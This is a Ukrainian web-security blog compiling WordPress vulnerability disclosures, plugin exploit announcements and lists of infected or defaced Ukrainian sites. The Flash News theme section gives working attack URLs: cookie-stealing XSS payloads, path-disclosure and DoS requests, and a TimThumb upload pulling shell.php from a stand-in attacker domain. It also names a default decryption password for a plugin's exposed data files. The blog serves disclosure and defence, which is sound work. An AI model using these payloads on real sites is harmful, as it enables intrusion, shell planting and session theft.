Websecurity - Веб безпека

Рік тому, Trustwave’s SpiderLabs опублікували численні уразливості в WordPress (що вони виявили наприкінці 2011 року). Я дещо відклав публікацію цих уразливостей, тому роблю це лише зараз. Вирішив детальніше з ними розібратися, бо з опису вони виглядають такими, що важко експлуатуються. І після повідомлення розробникам WP (та подальшого оприлюднення уразливостей), вони відмовилися їх виправляти саме з цієї причини.

В WordPress були виявлені PHP Code Execution, Cross Site Scripting (persistent і reflected) та Brute Force (логінів і паролів MySQL) уразливості. Причому через останню уразливість можна проводити підбор логінів і паролів MySQL Server як на локальному хості, так і зовнішніх хостах.

Раніше я вже писав про XSS уразливість в swfupload в WordPress.

CE / XSS / BF:

Уразливості наявні в setup-config.php. Особливістю атак на них є невелике “вікно атаки” - ці уразливості використати лише коли не встановлений движок на сайті. Тобто коли файли WP були розміщені на сайті, але движок ще не встигли встановити (зазвичай це дуже невеликий проміжок часу, бо движок інсталюють оперативно, тому нападникам важко буде підібрати вдалий час для проведення атаки).

Також я вважаю, що іншими умовами для проведення цих атак може бути використання відповідних уразливостей в WordPress, про які я писав раніше. Коли видалити файл wp-config.php через Arbitrary File Deletion дірку в WP.

• Multiple Vulnerabilities in WordPress (деталі)

Уразливі WordPress 3.3.1 та попередні версії.

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://eco-farm.com.ua - інфекція була виявлена 03.01.2013. Зараз сайт входить до переліку підозрілих.
• http://meta.ua - інфекція була виявлена 04.02.2013. Зараз сайт не входить до переліку підозрілих.
• http://dp.biz.ua - інфекція була виявлена 03.01.2013. Зараз сайт входить до переліку підозрілих.
• http://tyachiv.org - інфекція була виявлена 11.01.2013. Зараз сайт не входить до переліку підозрілих.
• http://www.tourism.tyachiv.org - інфекція була виявлена 11.01.2013. Зараз сайт входить до переліку підозрілих.
• http://mts.com.ua - інфекція була виявлена 05.02.2013. Зараз сайт не входить до переліку підозрілих.
• http://hottub.com.ua - інфекція була виявлена 10.12.2012. Зараз сайт входить до переліку підозрілих.
• http://it-group.dp.ua - інфекція була виявлена 17.11.2012. Зараз сайт не входить до переліку підозрілих.
• http://zarabotokplus.com.ua - інфекція була виявлена 31.01.2013. Зараз сайт входить до переліку підозрілих.
• http://vesillya.uz.ua - інфекція була виявлена 26.01.2013. Зараз сайт не входить до переліку підозрілих.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Cardoza, WordPress Uploader та Xerte Online. Для котрих з’явилися експлоіти. Cardoza - це плагін для голосування, WordPress Uploader - це плагін для завантаження файлів (це php-експлоіт для даного плагіна), Xerte Online - це плагін для електронного навчання.

• Multiple SQL injection vulnerabilities in Cardoza Wordpress poll plugin (деталі)
• WordPress Uploader 1.0.4 Shell Upload (деталі)
• WordPress Xerte Online 0.32 Shell Upload (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Сьогодні я дослідив Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service, Arbitrary File Upload та Information Leakage уразливості в темі Flash News для WordPress. А знайшов я уразливоті в цій темі від WooThemes ще у лютому 2011, коли виявив дірки в TimThumb (та деякі дірки у квітні), а цього разу я дослідив й інші дірки в цій темі.

В інших темах від WooThemes аналогічна ситуація (раніше я привів перелік 89 уразливих тем для WP від них).

XSS (WASC-08):

http://site/wp-content/themes/flashnews/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure (WASC-13):

http://site/wp-content/themes/flashnews/thumb.php?src=1
http://site/wp-content/themes/flashnews/thumb.php?src=http://site/page.png&h=1&w=1111111
http://site/wp-content/themes/flashnews/thumb.php?src=http://site/page.png&h=1111111&w=1

Abuse of Functionality (WASC-42):

http://site/wp-content/themes/flashnews/thumb.php?src=http://site&h=1&w=1
http://site/wp-content/themes/flashnews/thumb.php?src=http://site.badsite.com&h=1&w=1 (обхід обмежень на домен, якщо таке обмеження включене)

DoS (WASC-10):

http://site/wp-content/themes/flashnews/thumb.php?src=http://site/big_file&h=1&w=1
http://site/wp-content/themes/flashnews/thumb.php?src=http://site.badsite.com/big_file&h=1&w=1 (обхід обмежень на домен, якщо таке обмеження включене)

Arbitrary File Upload (WASC-31) (в невиправлених версіях TimThumb):

http://site/wp-content/themes/flashnews/thumb.php?src=http://site.badsite.com/shell.php

Full path disclosure (WASC-13):

http://site/wp-content/themes/flashnews/

Окрім index.php також можливі FPD в інших php-файлах в цій темі.

Information Leakage (WASC-13):

http://site/wp-content/themes/flashnews/includes/test.php

XSS (WASC-08) (в PHP < 4.4.1, 4.4.3-4.4.6):

http://site/wp-content/themes/flashnews/includes/test.php?a[]=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Уразливі всі версії теми Flash News для WordPress (в останніх версіях виправлені лише уразливості в thumb.php).

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://civic.kmu.gov.ua (хакером HTC 28 DZ) - 26.09.2012 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://ladrada.gov.ua (хакером SanFour25) - 04.11.2012 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://nmckherson.gov.ua (хакером SanFour25) - 04.11.2012 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://postsense.net (хакером hacker)
• http://glambaby.com.ua (хакерами з 1923Turk) - 10.12.2012, зараз сайт вже виправлений адмінами

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Sahifa, Shopping Cart та ReFlex Gallery. Для котрих з’явилися експлоіти. Sahifa - це тема движка, Shopping Cart - це плагін для створення онлайн-магазину, ReFlex Gallery - це плагін для створення галерей зображень.

• WordPress Sahifa 2.4.0 Cross Site Request Forgery / Path Disclosure (деталі)
• WordPress Shopping Cart 8.1.14 Shell Upload / SQL Injection (деталі)
• WordPress ReFlex Gallery 1.3 Shell Upload (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

29.10.2012

У жовтні, 07.10.2012, я виявив Information Leakage уразливості в плагіні WordPress Attack Scanner для WordPress. Дірки виявив у версії Free, але версія Pro також повинна бути уразливою. Про що найближчим часом повідомлю розробникам веб додатку.

Стосовно плагінів для WordPress раніше я писав про уразливості в Wordfence Security.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

29.01.2013

Information Leakage (WASC-13):

http://site/wp-content/plugins/path/data.txt
http://site/wp-content/plugins/path/archive.txt

Папка “path” може бути WP-Attack-Scanner або WP-Attack-Scanner-Free.

Вільний доступ до даних - їх можна прочитати в браузері без авторизації. Хоча дані зашифровані, але по замовчуванню пароль changepassword. Якщо пароль не був змінений, то дані легко розшифровуються, якщо ж змінений, то його можна підібрати.

Уразливі всі версії WordPress Attack Scanner, як безкоштовна, так і платна. Перевірялося на версії 0.9.5.beta.

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://tyachiv-rda.gov.ua - інфікований державний сайт - інфекція була виявлена 20.12.2012. Зараз сайт входить до переліку підозрілих.
• http://summit.dp.ua - інфекція була виявлена 22.01.2013. Зараз сайт не входить до переліку підозрілих.
• http://photo-portal.in.ua - інфекція була виявлена 22.01.2013. Зараз сайт входить до переліку підозрілих.
• http://tire.ua - інфекція була виявлена 20.11.2012. Зараз сайт не входить до переліку підозрілих.
• http://jettec-mrm.com.ua - інфекція була виявлена 01.12.2012. Зараз сайт не входить до переліку підозрілих.

В січні, 24.01.2013, вийшла нова версія WordPress 3.5.1.

WordPress 3.5.1 це секюріті та багфікс випуск нової 3.5 серії. В якому розробники виправили декілька уразливостей і 37 багів. Причому до багів віднесли FPD, що виникали при некоректній роботі плагінів. Полюбляють вони відносити дірки до багів, особливо FPD, і не перераховувати їх в списку виправлених уразливостей (тим самим штучно зменшуючи їх кількість, не кажучи вже про часте приховане виправлення уразливостей).

А також був виявлений баг з WP на IIS, який не допускає оновлення з версії 3.5 на 3.5.1. В цьому випадку розробники створили інструкції по проведенню оновлення WordPress на веб сервері IIS.

Стосовно покращення безпеки, то були виправлені наступні уразливості: server-side request forgery та remote port scanning через XML-RPC (використовуючи пінгбеки), 2 Cross-Site Scripting дірки в ядрі движка та 1 XSS в сторонній бібліотеці Plupload, що постачається з движком. З WP 3.5.1 постачається нова виправлена версія Plupload.

Якщо ці дві дірки в XML-RPC вони виправили, то Brute Force дірку, про яку я писав ще рік тому, вони так до цих пір виправити не спромоглися. І враховуючи, що після відключення по дефолту XML-RPC в WP 2.6, вони його включили по дефолту в версії 3.5, то це повернуло BF через XML-RPC в маси.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Asset-Manager, Photo Plus / Photo Search та SB Uploader. Для котрих з’явилися експлоіти. Asset-Manager - це плагін для управління документами і контролю версій, Photo Plus / Photo Search - це плагіни для роботи з фотографіями, SB Uploader - це плагін для завантаження зображень на сайт.

• WordPress Asset-Manager PHP File Upload (деталі)
• WordPress Photo Plus / Photo Search XSS / CSRF (деталі)
• WordPress SB Uploader 3.9 Shell Upload (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.